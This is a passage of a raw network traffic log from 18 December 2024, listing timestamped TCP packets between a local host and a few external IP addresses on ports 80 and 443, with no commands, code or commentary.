                                                                                                                                                                  Dec 18, 2024 11:09:12.805114031 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.805136919 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.805176020 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.806076050 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.806121111 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.806174040 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.806212902 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.807168007 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.807212114 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.807286024 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.807326078 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.808226109 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.808269024 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.808329105 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.808367014 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.809284925 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.809325933 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.809410095 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.809448004 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.810367107 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.810408115 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.810460091 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.810498953 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.811448097 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.811490059 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.811600924 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.811642885 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.812570095 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.812616110 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.812659979 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.812699080 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.813580036 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.813618898 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.813622952 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.813652992 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.814632893 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.814676046 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.814712048 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.814753056 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.933219910 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.933239937 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.933285952 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.933320045 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.934150934 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.934165955 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:12.934195995 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:12.934214115 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.052620888 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.052653074 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.052735090 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.052762032 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.053569078 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.053582907 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.053615093 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.172251940 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.172274113 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.172286987 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.172303915 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.172316074 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.172327995 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.172338963 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.172350883 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.172363043 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.172363997 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.172374964 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.172388077 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.172405005 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.172424078 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.172620058 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.172632933 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.172652006 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.172657013 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.172693014 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.172693014 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.172707081 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.172718048 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.172730923 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.172730923 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.172743082 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.172754049 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.172761917 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.172781944 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.172796965 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.173435926 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.173449039 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.173460007 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.173471928 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.173480034 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.173511982 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.173516035 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.173527956 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.173538923 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.173548937 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.173552036 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.173563004 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.173574924 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.173578024 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.173588037 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.173607111 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.173628092 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.174288988 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.174325943 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.174355030 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.174391031 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.174407005 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.174420118 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.174432039 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.174441099 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.174447060 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.174458027 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.174460888 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.174473047 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.174494028 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.174894094 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.174937010 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.175035000 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.175070047 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.175071001 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.175081968 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.175093889 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.175105095 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.175106049 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.175118923 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.175120115 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.175141096 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.175203085 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.176866055 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.176881075 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.176913023 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.176927090 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.177570105 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.177592993 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.177604914 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.177623034 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.177712917 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.177723885 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.177742958 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.177743912 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.177756071 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.177762032 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.177767038 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.177776098 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.177778959 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.177793980 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.177797079 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.177815914 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.177849054 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.178469896 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.178483963 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.178508043 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.178519964 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.178536892 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.178556919 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.178569078 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.178571939 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.178591967 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.178607941 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.179017067 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.179033041 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.179047108 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.179049015 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.179069042 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.179075956 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.179084063 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.179086924 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.179099083 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.179101944 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.179110050 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.179119110 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.179124117 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.179135084 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.179136038 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.179162979 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.179856062 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.179867983 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.179877996 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.179894924 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.179898024 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.179922104 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.179925919 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.179939032 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.179944038 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.179950953 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.179954052 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.179965973 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.179976940 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.180003881 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.180691957 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.180727959 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.180752993 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.180764914 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.180774927 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.180788040 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.180813074 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.180859089 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.180871010 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.180891037 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.180896044 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.180905104 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.180917978 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.180922031 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.180928946 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.180939913 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:13.180948973 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:13.180983067 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:15.550048113 CET4987180192.168.2.6185.215.113.43
                                                                                                                                                                  Dec 18, 2024 11:09:15.550499916 CET4988880192.168.2.6185.215.113.43
                                                                                                                                                                  Dec 18, 2024 11:09:15.670030117 CET8049888185.215.113.43192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:15.670084000 CET8049871185.215.113.43192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:15.670125008 CET4988880192.168.2.6185.215.113.43
                                                                                                                                                                  Dec 18, 2024 11:09:15.670160055 CET4987180192.168.2.6185.215.113.43
                                                                                                                                                                  Dec 18, 2024 11:09:15.670331001 CET4988880192.168.2.6185.215.113.43
                                                                                                                                                                  Dec 18, 2024 11:09:15.789730072 CET8049888185.215.113.43192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:17.000703096 CET8049888185.215.113.43192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:17.000757933 CET4988880192.168.2.6185.215.113.43
                                                                                                                                                                  Dec 18, 2024 11:09:17.003097057 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:17.007242918 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:17.122925043 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:17.123528004 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:17.126765013 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:17.126844883 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:17.127027988 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:17.246721029 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:17.581513882 CET49895443192.168.2.6172.67.179.109
                                                                                                                                                                  Dec 18, 2024 11:09:17.581562042 CET44349895172.67.179.109192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:17.581634998 CET49895443192.168.2.6172.67.179.109
                                                                                                                                                                  Dec 18, 2024 11:09:17.586405039 CET49895443192.168.2.6172.67.179.109
                                                                                                                                                                  Dec 18, 2024 11:09:17.586451054 CET44349895172.67.179.109192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.448532104 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.448563099 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.448575974 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.448589087 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.448636055 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.448647022 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.448659897 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.448659897 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.448704004 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.448872089 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.448884010 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.448895931 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.448908091 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.448914051 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.448935032 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.448964119 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.568406105 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.568475008 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.568483114 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.568525076 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.572487116 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.572531939 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.639249086 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.639318943 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.639384031 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.639420986 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.643409967 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.643454075 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.643455982 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.643491030 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.651938915 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.651982069 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.654864073 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.654912949 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.654922009 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.654948950 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.663232088 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.663248062 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.663286924 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.663325071 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.671611071 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.671662092 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.671884060 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.671922922 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.680834055 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.680876017 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.680982113 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.681021929 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.688302994 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.688352108 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.688426971 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.688467979 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.697609901 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.697628021 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.697663069 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.697690010 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.705943108 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.705959082 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.705990076 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.706011057 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.714822054 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.714843035 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.714869976 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.714889050 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.721648932 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.721656084 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.721693993 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.721735954 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.758848906 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.758907080 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.796633959 CET44349895172.67.179.109192.168.2.6
